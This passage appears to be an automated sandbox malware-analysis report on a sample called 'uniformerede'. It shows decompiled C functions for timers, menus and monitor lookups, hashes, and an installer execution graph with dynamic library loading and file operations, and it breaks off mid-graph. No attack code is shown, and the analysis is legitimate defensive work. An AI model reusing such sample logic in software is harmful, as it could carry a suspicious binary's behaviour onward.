                                                                                                                                                                                                                            				KillTimer( *(__eax + 0x34), 1);
                                                                                                                                                                                                                            				_t32 =  *(_t23 + 0x30);
                                                                                                                                                                                                                            				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0 && SetTimer( *(_t23 + 0x34), 1, _t32, 0) == 0) {
                                                                                                                                                                                                                            					_t18 =  *0x49de08; // 0x422f68
                                                                                                                                                                                                                            					E00406A70(_t18,  &_v8);
                                                                                                                                                                                                                            					E0040D144(_v8, 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t28);
                                                                                                                                                                                                                            				 *[fs:eax] = _t28;
                                                                                                                                                                                                                            				_push(0x42f706);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,00000000,0042F6FF,?,?,?,00000000), ref: 0042F69D
                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,?,00000000), ref: 0042F6BF
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Timer$KillLoadString
                                                                                                                                                                                                                            • String ID: h/B
                                                                                                                                                                                                                            • API String ID: 1423459280-860576603
                                                                                                                                                                                                                            • Opcode ID: 529066ee03a2b6d127a9d6b04acc1eb89f9b5d8459c0dc1aaa59090bcc4611f3
                                                                                                                                                                                                                            • Instruction ID: c638335ebb45f94185b8bc64c2a04c90921daa6f7a9a6c3e75923d264c20285e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 529066ee03a2b6d127a9d6b04acc1eb89f9b5d8459c0dc1aaa59090bcc4611f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C601B571B04210ABDB10EB61DC92F5A37BCDB45708FD1007AFD00AB2D2D7B9AC44C658
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0042C794(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t19 = _a12;
                                                                                                                                                                                                                            				if( *0x49e92b != 0) {
                                                                                                                                                                                                                            					_t16 = 0;
                                                                                                                                                                                                                            					if((_t19 & 0x00000003) != 0) {
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						_t16 = 0x12340042;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t21 = _a4;
                                                                                                                                                                                                                            						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t18 =  *0x49e90c; // 0x42c794
                                                                                                                                                                                                                            					 *0x49e90c = E0042C4FC(3, _t15, _t18, _t19, _t20);
                                                                                                                                                                                                                            					_t16 =  *0x49e90c(_a4, _a8, _t19);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t16;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C7E2
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C7F4
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromPoint
                                                                                                                                                                                                                            • API String ID: 1792783759-1072306578
                                                                                                                                                                                                                            • Opcode ID: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                                                            • Instruction ID: 3a8d409507ccd0e879ce772a810bcfc943f8b0dcea0ef563c0c7703c31a9de97
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3201A271301128AFDB10AF56ECC8B5EBB55EB90366FC0C037F9059B251C378AC008B68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0042C66C(intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr* _t14;
                                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                                            				signed int _t17;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t17 = _a8;
                                                                                                                                                                                                                            				_t14 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92a != 0) {
                                                                                                                                                                                                                            					_t19 = 0;
                                                                                                                                                                                                                            					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                                                                                                                                                                                                            						_t19 = 0x12340042;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t16 =  *0x49e908; // 0x42c66c
                                                                                                                                                                                                                            					 *0x49e908 = E0042C4FC(2, _t14, _t16, _t17, _t18);
                                                                                                                                                                                                                            					_t19 =  *0x49e908(_t14, _t17);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t19;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C6BD
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C6C9
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromRect
                                                                                                                                                                                                                            • API String ID: 1792783759-4033241945
                                                                                                                                                                                                                            • Opcode ID: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                                                            • Instruction ID: ff17a17d24a28b56e0f59b29e5112e5d3ba35734792e5f6c57e17e57efd49fd6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1601A771301128ABD760CB05F8C9B1A7755E764361F845077E805CB246C778EC40CBAC
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0044AE70(void* __eax) {
	void* _t16;
	intOrPtr _t17;

	_t16 = __eax;
	if( *((intOrPtr*)(__eax + 0x34)) == 0) {
		_t17 =  *0x449b38; // 0x449b84
		if(E00403D78( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
			 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
		} else {
			 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
		}
		if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
			E00449F18();
		}
		E0044AC00(_t16);
	}
	return  *((intOrPtr*)(_t16 + 0x34));
}






APIs
• CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
• CreateMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE95
Strings
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID: CreateMenu$Popup
• String ID: .B
• API String ID: 257293969-2011479308
• Opcode ID: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
• Instruction ID: ec3ec204bd3e4010e8879658da88cb666e7af430c2d7f16cc051fc7c4e83f06b
• Opcode Fuzzy Hash: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
• Instruction Fuzzy Hash: BFE06D306822008FEB50EF65DAC564A3BA8AF05309F9034BAA8119F347C738DC958B5A
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 20.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 7.7%
Total number of Nodes: 1623
Total number of Limit Nodes: 45
17 API calls 5412->5413 5415 40295c 5413->5415 5414 402972 5417 406133 2 API calls 5414->5417 5415->5414 5416 402da6 17 API calls 5415->5416 5416->5414 5418 402978 5417->5418 5440 406158 GetFileAttributesW CreateFileW 5418->5440 5420 402985 5421 402a3b 5420->5421 5422 4029a0 GlobalAlloc 5420->5422 5423 402a23 5420->5423 5424 402a42 DeleteFileW 5421->5424 5425 402a55 5421->5425 5422->5423 5426 4029b9 5422->5426 5427 403371 44 API calls 5423->5427 5424->5425 5441 4035f8 SetFilePointer 5426->5441 5429 402a30 CloseHandle 5427->5429 5429->5421 5430 4029bf 5431 4035e2 ReadFile 5430->5431 5432 4029c8 GlobalAlloc 5431->5432 5433 4029d8 5432->5433 5434 402a0c 5432->5434 5435 403371 44 API calls 5433->5435 5436 40620a WriteFile 5434->5436 5439 4029e5 5435->5439 5437 402a18 GlobalFree 5436->5437 5437->5423 5438 402a03 GlobalFree 5438->5434 5439->5438 5440->5420 5441->5430 5442 407452 5445 406be3 5442->5445 5443 406c64 GlobalFree 5444 406c6d GlobalAlloc 5443->5444 5444->5445 5446 40754e 5444->5446 5445->5443 5445->5444 5445->5445 5445->5446 5447 406ce4 GlobalAlloc 5445->5447 5448 406cdb GlobalFree 5445->5448 5447->5445 5447->5446 5448->5447 5449 403cd5 5450 403ce0 5449->5450 5451 403ce7 GlobalAlloc 5450->5451 5452 403ce4 5450->5452 5451->5452 5453 401956 5454 402da6 17 API calls 5453->5454 5455 40195d lstrlenW 5454->5455 5456 402638 5455->5456 5122 4014d7 5123 402d84 17 API calls 5122->5123 5124 4014dd Sleep 5123->5124 5126 402c2a 5124->5126 5457 687e23e9 5458 687e2453 5457->5458 5459 687e245e GlobalAlloc 5458->5459 5460 687e247d 5458->5460 5459->5458 5127 4020d8 5128 40219c 5127->5128 5129 4020ea 5127->5129 5131 401423 24 API calls 5128->5131 5130 402da6 17 API calls 5129->5130 5132 4020f1 5130->5132 5138 4022f6 5131->5138 5133 402da6 17 API calls 5132->5133 5134 4020fa 5133->5134 5135 402110 LoadLibraryExW 5134->5135 5136 402102 GetModuleHandleW 5134->5136 5135->5128 5137 402121 5135->5137 5136->5135 5136->5137 5150 406aa4 5137->5150 5141 402132 5143 402151 5141->5143 5144 
40213a 5141->5144 5142 40216b 5145 4056ca 24 API calls 5142->5145 5155 687e1817 5143->5155 5146 401423 24 API calls 5144->5146 5147 402142 5145->5147 5146->5147 5147->5138 5148 40218e FreeLibrary 5147->5148 5148->5138 5197 40668a WideCharToMultiByte 5150->5197 5152 406ac1 5153 406ac8 GetProcAddress 5152->5153 5154 40212c 5152->5154 5153->5154 5154->5141 5154->5142 5156 687e184a 5155->5156 5198 687e1bff 5156->5198 5158 687e1851 5159 687e1976 5158->5159 5160 687e1869 5158->5160 5161 687e1862 5158->5161 5159->5147 5232 687e2480 5160->5232 5244 687e243e 5161->5244 5166 687e18af 5257 687e2655 5166->5257 5167 687e18cd 5171 687e191e 5167->5171 5172 687e18d3 5167->5172 5168 687e187f 5176 687e1885 5168->5176 5177 687e1890 5168->5177 5169 687e1898 5181 687e188e 5169->5181 5254 687e2e23 5169->5254 5174 687e2655 9 API calls 5171->5174 5275 687e1666 5172->5275 5182 687e190f 5174->5182 5175 687e18b5 5267 687e1654 5175->5267 5176->5181 5238 687e2b98 5176->5238 5248 687e2810 5177->5248 5181->5166 5181->5167 5188 687e1965 5182->5188 5281 687e2618 5182->5281 5185 687e2655 9 API calls 5185->5182 5187 687e1896 5187->5181 5188->5159 5190 687e196f GlobalFree 5188->5190 5190->5159 5194 687e1951 5194->5188 5285 687e15dd wsprintfW 5194->5285 5195 687e194a FreeLibrary 5195->5194 5197->5152 5288 687e12bb GlobalAlloc 5198->5288 5200 687e1c26 5289 687e12bb GlobalAlloc 5200->5289 5202 687e1e6b GlobalFree GlobalFree GlobalFree 5203 687e1e88 5202->5203 5219 687e1ed2 5202->5219 5205 687e227e 5203->5205 5213 687e1e9d 5203->5213 5203->5219 5204 687e1d26 GlobalAlloc 5222 687e1c31 5204->5222 5206 687e22a0 GetModuleHandleW 5205->5206 5205->5219 5209 687e22c6 5206->5209 5210 687e22b1 LoadLibraryW 5206->5210 5207 687e1d71 lstrcpyW 5212 687e1d7b lstrcpyW 5207->5212 5208 687e1d8f GlobalFree 5208->5222 5296 687e16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5209->5296 5210->5209 5210->5219 5212->5222 5213->5219 5292 687e12cc 5213->5292 5214 687e2318 5218 687e2325 lstrlenW 
5214->5218 5214->5219 5215 687e2126 5295 687e12bb GlobalAlloc 5215->5295 5297 687e16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5218->5297 5219->5158 5220 687e22d8 5220->5214 5230 687e2302 GetProcAddress 5220->5230 5222->5202 5222->5204 5222->5207 5222->5208 5222->5212 5222->5215 5222->5219 5223 687e2067 GlobalFree 5222->5223 5224 687e21ae 5222->5224 5225 687e12cc 2 API calls 5222->5225 5226 687e1dcd 5222->5226 5223->5222 5224->5219 5229 687e2216 lstrcpyW 5224->5229 5225->5222 5226->5222 5290 687e162f GlobalSize GlobalAlloc 5226->5290 5227 687e233f 5227->5219 5229->5219 5230->5214 5231 687e212f 5231->5158 5236 687e2498 5232->5236 5233 687e12cc 2 API calls 5233->5236 5235 687e25c1 GlobalFree 5235->5236 5237 687e186f 5235->5237 5236->5233 5236->5235 5299 687e135a 5236->5299 5237->5168 5237->5169 5237->5181 5240 687e2baa 5238->5240 5239 687e2c4f CloseHandle 5243 687e2c6d 5239->5243 5240->5239 5242 687e2d39 5242->5181 5303 687e2b42 5243->5303 5245 687e2453 5244->5245 5246 687e245e GlobalAlloc 5245->5246 5247 687e1868 5245->5247 5246->5245 5247->5160 5252 687e2840 5248->5252 5249 687e28ee 5251 687e28f4 GlobalSize 5249->5251 5253 687e28fe 5249->5253 5250 687e28db GlobalAlloc 5250->5253 5251->5253 5252->5249 5252->5250 5253->5187 5255 687e2e2e 5254->5255 5256 687e2e6e GlobalFree 5255->5256 5307 687e12bb GlobalAlloc 5257->5307 5259 687e270b lstrcpynW 5263 687e265f 5259->5263 5260 687e26d8 MultiByteToWideChar 5260->5263 5261 687e2742 GlobalFree 5261->5263 5262 687e271e wsprintfW 5262->5263 5263->5259 5263->5260 5263->5261 5263->5262 5264 687e2777 GlobalFree 5263->5264 5265 687e1312 2 API calls 5263->5265 5308 687e1381 5263->5308 5264->5175 5265->5263 5312 687e12bb GlobalAlloc 5267->5312 5269 687e1659 5270 687e1666 2 API calls 5269->5270 5271 687e1663 5270->5271 5272 687e1312 5271->5272 5273 687e131b GlobalAlloc lstrcpynW 5272->5273 5274 687e1355 GlobalFree 5272->5274 5273->5274 5274->5182 5276 687e169f lstrcpyW 5275->5276 5277 687e1672 
wsprintfW 5275->5277 5280 687e16b8 5276->5280 5277->5280 5280->5185 5282 687e2626 5281->5282 5284 687e1931 5281->5284 5283 687e2642 GlobalFree 5282->5283 5282->5284 5283->5282 5284->5194 5284->5195 5286 687e1312 2 API calls 5285->5286 5287 687e15fe 5286->5287 5287->5188 5288->5200 5289->5222 5291 687e164d 5290->5291 5291->5226 5298 687e12bb GlobalAlloc 5292->5298 5294 687e12db lstrcpynW 5294->5219 5295->5231 5296->5220 5297->5227 5298->5294 5300 687e1361 5299->5300 5301 687e12cc 2 API calls 5300->5301 5302 687e137f 5301->5302 5302->5236 5304 687e2b4d 5303->5304 5305 687e2b5d 5304->5305 5306 687e2b52 GetLastError 5304->5306 5305->5242 5306->5305 5307->5263 5309 687e13ac 5308->5309 5310 687e138a 5308->5310 5309->5263 5310->5309 5311 687e1390 lstrcpyW 5310->5311 5311->5309 5312->5269 5461 402b59 5462 402b60 5461->5462 5463 402bab 5461->5463 5466 402d84 17 API calls 5462->5466 5468 402ba9 5462->5468 5464 406a35 5 API calls 5463->5464 5465 402bb2 5464->5465 5467 402da6 17 API calls 5465->5467 5469 402b6e 5466->5469 5470 402bbb 5467->5470 5471 402d84 17 API calls 5469->5471 5470->5468 5472 402bbf IIDFromString 5470->5472 5474 402b7a 5471->5474 5472->5468 5473 402bce 5472->5473 5473->5468 5479 406668 lstrcpynW 5473->5479 5478 4065af wsprintfW 5474->5478 5476 402beb CoTaskMemFree 5476->5468 5478->5468 5479->5476 5480 402a5b 5481 402d84 17 API calls 5480->5481 5482 402a61 5481->5482 5483 402aa4 5482->5483 5484 402a88 5482->5484 5489 40292e 5482->5489 5486 402abe 5483->5486 5487 402aae 5483->5487 5485 402a8d 5484->5485 5491 402a9e 5484->5491 5494 406668 lstrcpynW 5485->5494 5490 4066a5 17 API calls 5486->5490 5488 402d84 17 API calls 5487->5488 5488->5489 5490->5489 5495 4065af wsprintfW 5491->5495 5494->5489 5495->5489 5327 40175c 5328 402da6 17 API calls 5327->5328 5329 401763 5328->5329 5330 406187 2 API calls 5329->5330 5331 40176a 5330->5331 5332 406187 2 API calls 5331->5332 5332->5331 5496 401d5d 5497 402d84 17 API calls 5496->5497 5498 401d6e SetWindowLongW 
5497->5498 5499 402c2a 5498->5499 5333 401ede 5334 402d84 17 API calls 5333->5334 5335 401ee4 5334->5335 5336 402d84 17 API calls 5335->5336 5337 401ef0 5336->5337 5338 401f07 EnableWindow 5337->5338 5339 401efc ShowWindow 5337->5339 5340 402c2a 5338->5340 5339->5340 5500 4028de 5501 4028e6 5500->5501 5502 4028ea FindNextFileW 5501->5502 5504 4028fc 5501->5504 5503 402943 5502->5503 5502->5504 5506 406668 lstrcpynW 5503->5506 5506->5504 5507 406d5f 5511 406be3 5507->5511 5508 40754e 5509 406c64 GlobalFree 5510 406c6d GlobalAlloc 5509->5510 5510->5508 5510->5511 5511->5508 5511->5509 5511->5510 5512 406ce4 GlobalAlloc 5511->5512 5513 406cdb GlobalFree 5511->5513 5512->5508 5512->5511 5513->5512 5514 687e10e1 5524 687e1111 5514->5524 5515 687e12b0 GlobalFree 5516 687e11d7 GlobalAlloc 5516->5524 5517 687e1240 GlobalFree 5517->5524 5518 687e135a 2 API calls 5518->5524 5519 687e12ab 5519->5515 5520 687e1312 2 API calls 5520->5524 5521 687e129a GlobalFree 5521->5524 5522 687e116b GlobalAlloc 5522->5524 5523 687e1381 lstrcpyW 5523->5524 5524->5515 5524->5516 5524->5517 5524->5518 5524->5519 5524->5520 5524->5521 5524->5522 5524->5523 5525 401563 5526 402ba4 5525->5526 5529 4065af wsprintfW 5526->5529 5528 402ba9 5529->5528 5530 687e1058 5532 687e1074 5530->5532 5531 687e10dd 5532->5531 5533 687e1092 5532->5533 5543 687e15b6 5532->5543 5535 687e15b6 GlobalFree 5533->5535 5536 687e10a2 5535->5536 5537 687e10a9 GlobalSize 5536->5537 5538 687e10b2 5536->5538 5537->5538 5539 687e10c7 5538->5539 5540 687e10b6 GlobalAlloc 5538->5540 5542 687e10d2 GlobalFree 5539->5542 5541 687e15dd 3 API calls 5540->5541 5541->5539 5542->5531 5544 687e15bc 5543->5544 5545 687e15c2 5544->5545 5546 687e15ce GlobalFree 5544->5546 5545->5533 5546->5533 5554 401968 5555 402d84 17 API calls 5554->5555 5556 40196f 5555->5556 5557 402d84 17 API calls 5556->5557 5558 40197c 5557->5558 5559 402da6 17 API calls 5558->5559 5560 401993 lstrlenW 5559->5560 5562 4019a4 5560->5562 5561 4019e5 5562->5561 5566 
406668 lstrcpynW 5562->5566 5564 4019d5 5564->5561 5565 4019da lstrlenW 5564->5565 5565->5561 5566->5564 5567 40166a 5568 402da6 17 API calls 5567->5568 5569 401670 5568->5569 5570 40699e 2 API calls 5569->5570 5571 401676 5570->5571 5572 402aeb 5573 402d84 17 API calls 5572->5573 5574 402af1 5573->5574 5575 4066a5 17 API calls 5574->5575 5576 40292e 5574->5576 5575->5576 5577 4026ec 5578 402d84 17 API calls 5577->5578 5585 4026fb 5578->5585 5579 402838 5580 402745 ReadFile 5580->5579 5580->5585 5581 4061db ReadFile 5581->5585 5582 402785 MultiByteToWideChar 5582->5585 5583 40283a 5599 4065af wsprintfW 5583->5599 5585->5579 5585->5580 5585->5581 5585->5582 5585->5583 5587 4027ab SetFilePointer MultiByteToWideChar 5585->5587 5589 40284b 5585->5589 5590 406239 SetFilePointer 5585->5590 5587->5585 5588 40286c SetFilePointer 5588->5579 5589->5579 5589->5588 5591 40626d 5590->5591 5592 406255 5590->5592 5591->5585 5593 4061db ReadFile 5592->5593 5594 406261 5593->5594 5594->5591 5595 406276 SetFilePointer 5594->5595 5596 40629e SetFilePointer 5594->5596 5595->5596 5597 406281 5595->5597 5596->5591 5598 40620a WriteFile 5597->5598 5598->5591 5599->5579 5600 404a6e 5601 404aa4 5600->5601 5602 404a7e 5600->5602 5604 40462b 8 API calls 5601->5604 5603 4045c4 18 API calls 5602->5603 5605 404a8b SetDlgItemTextW 5603->5605 5606 404ab0 5604->5606 5605->5601 5036 40176f 5037 402da6 17 API calls 5036->5037 5038 401776 5037->5038 5039 401796 5038->5039 5040 40179e 5038->5040 5075 406668 lstrcpynW 5039->5075 5076 406668 lstrcpynW 5040->5076 5043 4017a9 5045 405f37 3 API calls 5043->5045 5044 40179c 5047 4068ef 5 API calls 5044->5047 5046 4017af lstrcatW 5045->5046 5046->5044 5064 4017bb 5047->5064 5048 40699e 2 API calls 5048->5064 5050 406133 2 API calls 5050->5064 5051 4017cd CompareFileTime 5051->5064 5052 40188d 5054 4056ca 24 API calls 5052->5054 5053 401864 5055 4056ca 24 API calls 5053->5055 5063 401879 5053->5063 5057 401897 5054->5057 5055->5063 5056 406668 lstrcpynW 
5056->5064 5058 403371 44 API calls 5057->5058 5059 4018aa 5058->5059 5060 4018be SetFileTime 5059->5060 5062 4018d0 FindCloseChangeNotification 5059->5062 5060->5062 5061 4066a5 17 API calls 5061->5064 5062->5063 5065 4018e1 5062->5065 5064->5048 5064->5050 5064->5051 5064->5052 5064->5053 5064->5056 5064->5061 5072 405cc8 MessageBoxIndirectW 5064->5072 5074 406158 GetFileAttributesW CreateFileW 5064->5074 5066 4018e6 5065->5066 5067 4018f9 5065->5067 5068 4066a5 17 API calls 5066->5068 5069 4066a5 17 API calls 5067->5069 5070 4018ee lstrcatW 5068->5070 5071 401901 5069->5071 5070->5071 5071->5063 5073 405cc8 MessageBoxIndirectW 5071->5073 5072->5064 5073->5063 5074->5064 5075->5044 5076->5043 5607 401a72 5608 402d84 17 API calls 5607->5608 5609 401a7b 5608->5609 5610 402d84 17 API calls 5609->5610 5611 401a20 5610->5611 5612 401573 5613 401583 ShowWindow 5612->5613 5614 40158c 5612->5614 5613->5614 5615 40159a ShowWindow 5614->5615 5616 402c2a 5614->5616 5615->5616 5617 4023f4 5618 402da6 17 API calls 5617->5618 5619 402403 5618->5619 5620 402da6 17 API calls 5619->5620 5621 40240c 5620->5621 5622 402da6 17 API calls 5621->5622 5623 402416 GetPrivateProfileStringW 5622->5623 5624 4014f5 SetForegroundWindow 5625 402c2a 5624->5625 5626 401ff6 5627 402da6 17 API calls 5626->5627 5628 401ffd 5627->5628 5629 40699e 2 API calls 5628->5629 5630 402003 5629->5630 5632 402014 5630->5632 5633 4065af wsprintfW 5630->5633 5633->5632 5634 401b77 5635 402da6 17 API calls 5634->5635 5636 401b7e 5635->5636 5637 402d84 17 API calls 5636->5637 5638 401b87 wsprintfW 5637->5638 5639 402c2a 5638->5639 5640 4046fa lstrcpynW lstrlenW 5313 40167b 5314 402da6 17 API calls 5313->5314 5315 401682 5314->5315 5316 402da6 17 API calls 5315->5316 5317 40168b 5316->5317 5318 402da6 17 API calls 5317->5318 5319 401694 MoveFileW 5318->5319 5320 4016a0 5319->5320 5321 4016a7 5319->5321 5322 401423 24 API calls 5320->5322 5323 40699e 2 API calls 5321->5323 5325 4022f6 5321->5325 5322->5325 5324 
